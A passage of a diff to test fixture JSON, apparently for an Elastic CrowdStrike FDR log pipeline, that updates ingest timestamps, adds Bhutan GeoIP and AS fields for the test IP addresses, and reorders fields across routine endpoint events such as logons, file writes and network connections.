@@ -6705,7 +7608,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151124100Z", + "ingested": "2021-12-14T14:41:26.533785482Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2602391615\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"223442259384\",\"ContextTimeStamp\":\"1604855116.849\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"67.43.156.14\",\"LocalPort\":\"53961\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"67.43.156.14\",\"RemotePort\":\"443\",\"aid\":\"fffffffff000426eb99afaa2ccdcbc17\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-b0eb-06be7616c211\",\"name\":\"NetworkConnectIP4V5\",\"timestamp\":\"1604855116942\"}", "created": "2020-11-08T17:05:16.942Z", "kind": "event", @@ -6747,12 +7650,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff8d2e4b4f9b21b40633a8d579", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff8d2e4b4f9b21b40633a8d579", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:04:51.781Z", "ecs": { 
@@ -6774,7 +7686,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151130300Z", + "ingested": "2021-12-14T14:41:26.533785897Z", "original": "{\"AuthenticationId\":\"6580764513\",\"AuthenticationPackage\":\"Negotiate\",\"ClientComputerName\":\"-\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"816054990879\",\"ContextThreadId\":\"52913017705957\",\"ContextTimeStamp\":\"1604855091.781\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonDomain\":\"NT AUTHORITY\",\"LogonServer\":\"\",\"LogonTime\":\"1604855091.781\",\"LogonType\":\"9\",\"PasswordLastSet\":\"\",\"RemoteAccount\":\"1\",\"UserFlags\":\"0\",\"UserIsAdmin\":\"0\",\"UserLogonFlags\":\"12\",\"UserName\":\"SYSTEM\",\"UserPrincipal\":\"user4@dom2\",\"UserSid\":\"S-1-5-18\",\"aid\":\"ffffffff8d2e4b4f9b21b40633a8d579\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogon\",\"id\":\"ffffffff-1111-11eb-a8cf-0649c95cfa1d\",\"name\":\"UserLogonV8\",\"timestamp\":\"1604855121077\"}", "created": "2020-11-08T17:05:21.077Z", "kind": "event", @@ -6828,12 +7740,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff2c47454cba360bc404a607bb", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff2c47454cba360bc404a607bb", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:20.785Z", "file": { 
@@ -6865,7 +7786,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151136700Z", + "ingested": "2021-12-14T14:41:26.533786288Z", "original": "{\"AuthenticationId\":\"2007206396\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"4415814628770\",\"ContextThreadId\":\"41392001729898\",\"ContextTimeStamp\":\"1604855120.785\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_1000\\u0026DEV_0054\\u0026SUBSYS_197615AD\\u0026REV_01\\\\4\\u00261f16fef7\\u00260\\u002600A8\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c\",\"FileObject\":\"18446708893089967904\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"0\",\"IsOnRemovableDisk\":\"0\",\"IsTransactedFile\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"SHA256HashData\":\"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182\",\"Size\":\"6144\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\Users\\\\user10\\\\AppData\\\\Local\\\\Temp\\\\ec1ijefl.dll\",\"TokenType\":\"1\",\"aid\":\"ffffffff2c47454cba360bc404a607bb\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"PeFileWritten\",\"id\":\"ffffffff-1111-11eb-b091-06f6cca0a049\",\"name\":\"PeFileWrittenV14\",\"timestamp\":\"1604855121109\"}", "created": "2020-11-08T17:05:21.109Z", "kind": "event", 
@@ -6899,24 +7820,27 @@ } }, { - "os": { - "type": "windows" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffffe0104823bd3de859d5bc8bc7", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffe0104823bd3de859d5bc8bc7", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:34.461Z", + "os": { + "type": "windows" + }, "ecs": { "version": "1.12.0" }, @@ -6937,7 +7861,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151143Z", + "ingested": "2021-12-14T14:41:26.533786684Z", "original": "{\"AuthenticationId\":\"317005428\",\"AuthenticationPackage\":\"Negotiate\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3950066843\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogoffTime\":\"1604855132.756\",\"LogonDomain\":\"dom1\",\"LogonServer\":\"srv2\",\"LogonTime\":\"1604855131.666\",\"LogonType\":\"7\",\"PasswordLastSet\":\"1598119332.510\",\"RemoteAccount\":\"1\",\"UserFlags\":\"32\",\"UserIsAdmin\":\"0\",\"UserLogoffType\":\"3\",\"UserLogonFlags\":\"0\",\"UserName\":\"user4\",\"UserPrincipal\":\"user.name@dom2.com\",\"UserSid\":\"S-1-5-21-606747145-1364589140-725345543-28636\",\"aid\":\"ffffffffe0104823bd3de859d5bc8bc7\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogoff\",\"id\":\"ffffffff-1111-11eb-8913-0287fd11c79b\",\"name\":\"UserLogoffV3\",\"timestamp\":\"1604855134461\"}", "created": "2020-11-08T17:05:34.461Z", "kind": "event", 
@@ -6976,7 +7900,13 @@ "id": "S-1-5-21-606747145-1364589140-725345543-28636", "email": "user.name@dom2.com", "domain": "dom2.com" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6995,12 +7925,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff425942f58382dbb11350eeda", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff425942f58382dbb11350eeda", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:03:45.966Z", "file": { 
@@ -7026,7 +7965,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151149300Z", + "ingested": "2021-12-14T14:41:26.533787066Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"537307300\",\"ContextProcessId\":\"635780922149\",\"ContextThreadId\":\"9479299143023\",\"ContextTimeStamp\":\"1604855025.966\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"0e02a8c7ed9d244887cef0409af0e6190030000000001100\",\"FileObject\":\"18446695174291796544\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"83886176\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Program Files\\\\Snow Software\\\\Inventory\\\\Agent\\\\cloudmeteringhost.exe\",\"aid\":\"ffffffff425942f58382dbb11350eeda\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableWritten\",\"id\":\"ffffffff-1111-11eb-93cb-067deb43537b\",\"name\":\"NewExecutableWrittenV1\",\"timestamp\":\"1604855149643\"}", "created": "2020-11-08T17:05:49.643Z", "kind": "event", @@ -7091,12 +8030,21 @@ "direction": "unknown" }, "observer": { - "serial_number": "ffffffffa51b4acf9dbc1fc273e6145c", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffa51b4acf9dbc1fc273e6145c", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:50.066Z", "ecs": { 
@@ -7118,7 +8066,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151155600Z", + "ingested": "2021-12-14T14:41:26.533787447Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"50714198593318\",\"ContextThreadId\":\"194302491825207\",\"ContextTimeStamp\":\"1604855150.066\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"59491\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa51b4acf9dbc1fc273e6145c\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"NetworkListenIP4V5\",\"timestamp\":\"1604855150545\"}", "created": "2020-11-08T17:05:50.545Z", "kind": "event", @@ -7154,6 +8102,18 @@ "type": "windows" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -7164,12 +8124,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffd8844a59acce5e1f4ad01888", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffd8844a59acce5e1f4ad01888", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:52.993Z", "ecs": { 
@@ -7193,7 +8162,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151161900Z", + "ingested": "2021-12-14T14:41:26.533787858Z", "original": "{\"ClientComputerName\":\"com1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"7073822473144\",\"ContextThreadId\":\"48689911139327\",\"ContextTimeStamp\":\"1604855152.993\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"744\",\"EtwRawThreadId\":\"5304\",\"LogonDomain\":\"BROADCAST\",\"LogonType\":\"3\",\"RemoteAddressIP4\":\"67.43.156.14\",\"Status\":\"3221225581\",\"SubStatus\":\"3221225578\",\"UserName\":\"user5\",\"aid\":\"ffffffffd8844a59acce5e1f4ad01888\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed2\",\"id\":\"ffffffff-1111-11eb-a8aa-067029dffccb\",\"name\":\"UserLogonFailed2V2\",\"timestamp\":\"1604855154274\"}", "created": "2020-11-08T17:05:54.274Z", "kind": "event", @@ -7241,12 +8210,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff4a0946365161093453e596d4", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff4a0946365161093453e596d4", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:51.534Z", "file": { 
@@ -7272,7 +8250,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151168200Z", + "ingested": "2021-12-14T14:41:26.533788301Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextProcessId\":\"1838383212125\",\"ContextThreadId\":\"27242382481217\",\"ContextTimeStamp\":\"1604855151.534\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff\",\"FileObject\":\"18446636884348143072\",\"IrpFlags\":\"1028\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files\\\\WindowsApps\\\\Deleted\\\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\\\clrcompression.dll\",\"aid\":\"ffffffff4a0946365161093453e596d4\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ExecutableDeleted\",\"id\":\"ffffffff-1111-11eb-b23b-064dea059649\",\"name\":\"ExecutableDeletedV3\",\"timestamp\":\"1604855154670\"}", "created": "2020-11-08T17:05:54.670Z", "kind": "event", @@ -7300,6 +8278,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "vendor": "crowdstrike", + "ip": "67.43.156.13", + "serial_number": "ffffffffcfe84e8c6a52c4001bd83761", + "type": "agent", + "version": "1007.4.0009202.1" + }, "process": { "pid": 20195, "thread": { 
@@ -7310,24 +8305,10 @@ "sha256": "295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a" } }, + "@timestamp": "2020-11-08T17:05:35.209Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffffcfe84e8c6a52c4001bd83761", - "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0009202.1", - "vendor": "crowdstrike", - "ip": "67.43.156.13" - }, - "@timestamp": "2020-11-08T17:05:35.209Z", "ecs": { "version": "1.12.0" }, @@ -7344,7 +8325,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151174600Z", + "ingested": "2021-12-14T14:41:26.533788690Z", "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009202.1\",\"ConfigStateHash\":\"230795414\",\"ContextProcessId\":\"318137549555284836\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855135.209\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"20195\",\"SHA256HashData\":\"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"318137549555284836\",\"aid\":\"ffffffffcfe84e8c6a52c4001bd83761\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-ae31-065d76bec0c3\",\"name\":\"EndOfProcessMacV11\",\"timestamp\":\"1604855160047\"}", "created": "2020-11-08T17:06:00.047Z", "kind": "event", 
@@ -7378,9 +8359,32 @@ "NetworkCloseCount": 0, "SuspectStackCount": 0, "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff80984ea8b49d9a53f590c566", + "type": "agent", + "version": "1007.3.0011603.1" + }, "process": { "entity_id": "683078218537", "pid": 19400, @@ -7388,24 +8392,10 @@ "id": 9384 } }, + "@timestamp": "2020-11-08T17:06:11.731Z", "os": { "type": "windows" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff80984ea8b49d9a53f590c566", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2020-11-08T17:06:11.731Z", "ecs": { "version": "1.12.0" }, @@ -7421,7 +8411,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151181Z", + "ingested": "2021-12-14T14:41:26.533789073Z", "original": "{\"ApiReturnValue\":\"1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"683078218537\",\"ContextTimeStamp\":\"1604855171.731\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"EtwRawProcessId\":\"19400\",\"EtwRawThreadId\":\"9384\",\"aid\":\"ffffffff80984ea8b49d9a53f590c566\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"RegisterRawInputDevicesEtw\",\"id\":\"ffffffff-1111-11eb-a570-0685ba2a382f\",\"name\":\"RegisterRawInputDevicesEtwV1\",\"timestamp\":\"1604855173077\"}", "created": "2020-11-08T17:06:13.077Z", "kind": "event", 
@@ -7443,7 +8433,13 @@ "EffectiveTransmissionClass": "3", "Entitlements": "15", "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "server": { @@ -7470,12 +8466,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffffc94c645268f64fc900213f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffffc94c645268f64fc900213f", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:14.018Z", "file": { @@ -7497,7 +8502,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151187300Z", + "ingested": "2021-12-14T14:41:26.533789458Z", "original": "{\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteV1\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys\",\"DownloadPort\":\"443\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"EffectiveTransmissionClass\":\"0\",\"Entitlements\":\"15\",\"TargetFileName\":\"C-00000013-00000000-00000408.sys\",\"aid\":\"ffffffffffc94c645268f64fc900213f\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"LFODownloadConfirmation\",\"id\":\"ffffffff-1111-11eb-8ab5-0643392fc75d\",\"name\":\"LFODownloadConfirmationV1\",\"timestamp\":\"1604855174018\"}", "created": "2020-11-08T17:06:14.018Z", "kind": "event", 
@@ -7538,12 +8543,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff280b41b956a91e816bd9b9b0", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff280b41b956a91e816bd9b9b0", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:46.590Z", "file": { @@ -7569,7 +8583,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151193600Z", + "ingested": "2021-12-14T14:41:26.533789944Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1763245019\",\"ContextProcessId\":\"2071361595421\",\"ContextThreadId\":\"41650430047375\",\"ContextTimeStamp\":\"1604855146.590\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"FileObject\":\"18446622606546437424\",\"IrpFlags\":\"395312\",\"MajorFunction\":\"6\",\"MinorFunction\":\"0\",\"NewFileIdentifier\":\"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00\",\"OperationFlags\":\"0\",\"SourceFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\temp\\\\EKA0UARWWK\\\\Microsoft.WSMan.Management.ni.dll\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Microsoft.We0722664#\\\\c2579d00f9849413b8b7948dd00ac863\\\\Microsoft.WSMan.Management.ni.dll\",\"aid\":\"ffffffff280b41b956a91e816bd9b9b0\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8162-0663305b686f\",\"name\":\"NewExecutableRenamedV6\",\"timestamp\":\"1604855177513\"}", "created": "2020-11-08T17:06:17.513Z", "kind": "event", 
@@ -7615,12 +8629,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff2c9f4066b0b5f2f00265503c", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff2c9f4066b0b5f2f00265503c", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:05.213Z", "file": { @@ -7645,7 +8668,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151200Z", + "ingested": "2021-12-14T14:41:26.533790341Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"402097454\",\"ContextProcessId\":\"66601077523\",\"ContextThreadId\":\"2500785639062\",\"ContextTimeStamp\":\"1604855165.213\",\"DesiredAccess\":\"1048577\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"128\",\"FileIdentifier\":\"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700\",\"FileObject\":\"18446641334185168032\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"35668001\",\"ShareAccess\":\"3\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\CbsTemp\\\\30848497_1904507751\\\\FodWU\",\"aid\":\"ffffffff2c9f4066b0b5f2f00265503c\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DirectoryCreate\",\"id\":\"ffffffff-1111-11eb-9411-06b7c99be087\",\"name\":\"DirectoryCreateV1\",\"timestamp\":\"1604855180332\"}", "created": "2020-11-08T17:06:20.332Z", "kind": "event", 
@@ -7704,12 +8727,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "fffffffffcc4413057adc260e99b0774", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "fffffffffcc4413057adc260e99b0774", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:06:36.468Z", "ecs": { @@ -7730,7 +8762,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151206400Z", + "ingested": "2021-12-14T14:41:26.533790750Z", "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k netsvcs -p -s wlidsvc\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextTimeStamp\":\"1604855196.468\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume3\\\\Windows\\\\System32\\\\svchost.exe\",\"InterfaceGuid\":\"367ABB81-9844-35F1-AD32-98F038001003\",\"InterfaceVersion\":\"131072\",\"RpcClientProcessId\":\"949196415400\",\"RpcClientThreadId\":\"44209361549673\",\"RpcNestingLevel\":\"0\",\"RpcOpNum\":\"19\",\"ServiceDisplayName\":\"wlidsvc\",\"TargetProcessId\":\"955370934902\",\"TokenType\":\"1\",\"UserName\":\"user6\",\"aid\":\"fffffffffcc4413057adc260e99b0774\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ServiceStarted\",\"id\":\"ffffffff-1111-11eb-9c98-02c501fe7d81\",\"name\":\"ServiceStartedV2\",\"timestamp\":\"1604855196635\"}", "created": "2020-11-08T17:06:36.635Z", "kind": "event", 
@@ -7792,12 +8824,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "ffffffffed0f41575620ab9fb25ce105", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffed0f41575620ab9fb25ce105", + "type": "agent", + "version": "1007.4.0011104.1" }, "@timestamp": "2020-11-08T17:06:40.751Z", "ecs": { @@ -7819,7 +8860,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151212800Z", + "ingested": "2021-12-14T14:41:26.533791183Z", "original": 